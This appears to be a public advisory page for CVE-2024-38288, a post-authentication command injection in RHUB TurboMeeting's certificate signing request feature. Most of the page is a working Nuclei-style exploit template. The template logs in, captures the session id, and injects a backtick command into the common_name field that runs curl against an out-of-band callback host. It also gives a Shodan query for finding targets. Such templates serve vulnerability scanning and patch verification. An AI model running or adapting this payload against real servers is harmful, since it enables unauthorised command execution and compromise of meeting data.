CVE-2024-38288: TurboMeeting - Post-Authentication Command Injection

2025-08-01 TurboMeeting PoC Public

Description

The Certificate Signing Request (CSR) feature in the admin portal of the application is vulnerable to command injection. This vulnerability could allow authenticated admin users to execute arbitrary commands on the underlying server by injecting malicious input into the CSR generation process. The application failed to properly sanitize user-supplied input before using it in a command executed privileges.

PoC

id: CVE-2024-38288

info:
  name: TurboMeeting - Post-Authentication Command Injection
  author: rootxharsh,iamnoooob,pdresearch
  severity: high
  description: |
    The Certificate Signing Request (CSR) feature in the admin portal of the application is vulnerable to command injection. This vulnerability could allow authenticated admin users to execute arbitrary commands on the underlying server by injecting malicious input into the CSR generation process. The application failed to properly sanitize user-supplied input before using it in a command executed privileges.
  impact: |
    Authenticated admin users can execute arbitrary OS commands on the TurboMeeting server through malicious CSR input, leading to complete system compromise and potential access to all meeting data.
  remediation: |
    Upgrade to the latest patched version of RHUB TurboMeeting or apply vendor-provided security updates.
  reference:
    - https://github.com/google/security-research/security/advisories/GHSA-gx6g-8mvx-3q5c
    - https://www.rhubcom.com/v5/manuals.html
  classification:
    epss-score: 0.03189
    epss-percentile: 0.87448
    cpe: cpe:2.3:a:rhubcom:turbomeeting:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    shodan-query: html:"TurboMeeting"
    product: turbomeeting
    vendor: rhubcom
  tags: cve,cve2024,rce,turbomeeting,authenticated,vuln

variables:
  username: "{{username}}"
  password: "{{password}}"

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /as/wapi/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        next_path=%2Fas%2Fwapi%2Fprofile_entry&Email={{username}}&Password={{password}}&submit=Login

    matchers:
      - type: word
        part: body
        words:
          - "as/wapi/profile_entry?sid="
        internal: true

    extractors:
      - type: regex
        name: sid
        part: body
        group: 1
        regex:
          - 'sid=(.*?)"'
        internal: true

  - raw:
      - |
        @timeout: 20s
        POST /as/wapi/generate_csr HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        sid={{sid}}&common_name=1"%20out%20/dev/null"`curl%20{{interactsh-url}}`&company_name=1&state=1&city=1&country=US&submit=Generate+CSR

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - CSR
          - SSL
        condition: and

      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "dns"
# digest: 4b0a00483046022100d66fe8ba64a096a7a6beeb0608ca7761219af2375d0ab06813e4706ca18266b6022100d77a00a91d9515e70f63ebc310d6ab9d991d3b24929741ade309fcad7fb32d72:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities